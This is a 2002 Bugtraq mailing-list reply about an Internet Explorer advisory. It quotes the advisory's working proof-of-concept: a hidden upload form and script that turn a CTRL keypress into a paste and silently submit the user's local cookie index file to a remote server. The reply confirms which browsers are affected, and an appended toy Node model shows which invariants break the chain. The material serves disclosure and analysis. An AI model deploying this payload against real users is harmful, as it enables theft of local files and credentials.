[26290] in bugtraq


Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8

daemon@ATHENA.MIT.EDU (Peter Pentchev)
Wed Jul 24 14:55:01 2002

Date: Wed, 24 Jul 2002 11:42:01 +0300
From: Peter Pentchev <roam@ringlet.net>
To: Andreas Sandblad <sandblad@acc.umu.se>
Cc: bugtraq@securityfocus.com
Message-ID: <20020724084201.GG382@straylight.oblivion.bg>
Mail-Followup-To: Andreas Sandblad <sandblad@acc.umu.se>,
	bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="/WwmFnJnmDyWGHa4"
Content-Disposition: inline
In-Reply-To: <Pine.LNX.4.44.0207232147450.24633-100000@mao.acc.umu.se>

--/WwmFnJnmDyWGHa4
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote:
>
>                   - Sandblad advisory #8 -
>
> ---..---..---..---..---..---..---..---..---..---..---..---..----
> Title:      Pressing CTRL in IE is dangerous
> Date:       [2002-07-23]
> Software:   Internet Explorer
> Impact:     Pressing CTRL in IE may result in arbitrary local
>             file to be uploaded to a remote server (no exact
>             path needed). If special sensitive information is
>             uploaded, it may be used to run remote programs.
[snip]
> 1. When an user presses the CTRL key an onkeydown event can be set to
> fire. In the event function the key pressed is changed to 'V'. The result
> will be a paste operation with less restrictions.
>
> 2. The content of the clipboard is altered and focus is changed to a
> hidden file upload form. The paste operation will be performed into the
> form, yielding a change of value for the file upload field (not normally
> allowed).
>
> 3. The upload form is submitted automatically (legal javascript operation).
[snip]
> <!div id=h style="zoom:0.0001">
> <!form name=u enctype="multipart/form-data" method=post action=upload.php>
> <!input type=file name=file></form></div>
> <!script>
> //uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
> uploadFile="..\\Cookies\\index.dat";
> function gotKey(){
>   if (!event.ctrlKey) return;
>   document.onkeydown = null;
>   event.keyCode = 86;
>   window.clipboardData.setData("Text",uploadFile);
>   (p=document.forms.u.file).focus();
>   p.onpropertychange = function(){document.forms.u.submit()};
> } document.onkeydown = gotKey;
> window.onload=function(){document.body.focus()};
> <!/script>

This was verified to work on various versions of IE 5 and 6, and also
on Opera 6.01 build 1041.  However, Mozilla 1.0rc1 is NOT vulnerable,
partly because of a script error (the onkeypress handler should accept
a parameter instead of referring to 'event' directly), and mostly because
of the fact that in Mozilla, event.keyCode is not settable.

G'luck,
Peter

-- 
Peter Pentchev	roam@ringlet.net	roam@FreeBSD.org
PGP key:	http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint	FDBA FD79 C26F 3C51 C95E  DF9E ED18 B68D 1619 4553
If you think this sentence is confusing, then change one pig.

--/WwmFnJnmDyWGHa4
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)

iD8DBQE9PmhZ7Ri2jRYZRVMRAgYFAJwNw+R3pp3V7GB/HXa2M+Rsvn+PtQCeKiQV
YEaJVJGrDp/Ma3OYZK7vANc=
=OcuG
-----END PGP SIGNATURE-----

--/WwmFnJnmDyWGHa4--
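Editor's added example (not part of the message above, and not the advisory's script): a toy model of the IE object model used by the quoted advisory, with just enough of it (a keydown event with keyCode, clipboardData.setData, a focusable file input with onpropertychange, a form with submit) to show which browser invariants break the three-step chain. The two switches, keyCodeWritable and fileInputPasteable, are assumptions of the model: the first corresponds to Peter's observation that Mozilla 1.0rc1 does not let script set event.keyCode, the second to a file input whose value cannot be changed by a paste. The file name is a constructed placeholder. Run it with node.

```javascript
// Added model, not browser code: simulates one keydown dispatch the way the
// quoted advisory relies on it (page handler runs first, then the browser's
// default action for whatever keyCode the event ends up with).
function makeBrowser(opts) {
  const { keyCodeWritable, fileInputPasteable } = opts;   // modelling assumptions
  const submitted = [];                                    // file names that reached form.submit()
  const fileInput = { value: '', onpropertychange: null };
  const form = { file: fileInput, submit() { submitted.push(fileInput.value); } };
  const clipboardData = { text: '', setData(_fmt, s) { this.text = s; } };
  let focused = null;
  fileInput.focus = function () { focused = fileInput; };

  function dispatchKeydown(keyCode, ctrlKey, handler) {
    const event = { ctrlKey };
    if (keyCodeWritable) {
      event.keyCode = keyCode;   // plain writable property (IE 5/6, Opera 6.01 per the reply)
    } else {
      // Mozilla 1.0rc1 per the reply: script cannot change keyCode. A write to
      // it throws in strict mode and is silently ignored otherwise; either way
      // the event keeps the key the user actually pressed.
      Object.defineProperty(event, 'keyCode', { value: keyCode, writable: false });
    }
    try {
      handler(event);            // the page's handler runs before the default action
    } catch (e) {
      if (!(e instanceof TypeError)) throw e;
    }
    // Default action: Ctrl+V (keyCode 86) pastes clipboard text into the focused
    // element, but only if that element accepts pasted text at all.
    if (event.keyCode === 86 && event.ctrlKey && focused === fileInput && fileInputPasteable) {
      fileInput.value = clipboardData.text;
      if (fileInput.onpropertychange) fileInput.onpropertychange();
    }
  }

  return { form, clipboardData, dispatchKeydown, submitted };
}

// Mirrors the advisory's three steps against the toy browser and returns the
// list of file names that would have been submitted (empty if the chain broke).
function runChain(opts) {
  const b = makeBrowser(opts);
  const uploadFile = 'PLACEHOLDER-local-file.txt';        // constructed placeholder
  function gotKey(event) {                                 // takes the event as a parameter, as the reply notes it should
    if (!event.ctrlKey) return;
    event.keyCode = 86;                                    // step 1: turn the CTRL keydown into a 'V'
    b.clipboardData.setData('Text', uploadFile);           // step 2: seed the clipboard ...
    b.form.file.focus();                                   // ... and focus the hidden file input
    b.form.file.onpropertychange = function () { b.form.submit(); }; // step 3: submit on value change
  }
  b.dispatchKeydown(17, true, gotKey);                     // the user presses CTRL (keyCode 17)
  return b.submitted;
}

// True when the modelled browser stops the chain before form.submit() is reached.
function chainBlocked(opts) {
  return runChain(opts).length === 0;
}

// runChain({ keyCodeWritable: true,  fileInputPasteable: true })  -> ['PLACEHOLDER-local-file.txt']
// chainBlocked({ keyCodeWritable: false, fileInputPasteable: true })  -> true  (read-only keyCode)
// chainBlocked({ keyCodeWritable: true,  fileInputPasteable: false }) -> true  (file input rejects the paste)
```

Either invariant alone is enough: with keyCode read-only the CTRL press never becomes a paste, and with a file input that does not take pasted text the clipboard contents never reach the field, so onpropertychange never fires. Current browsers enforce the second one directly, since a file input's value cannot be set by script except to the empty string.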
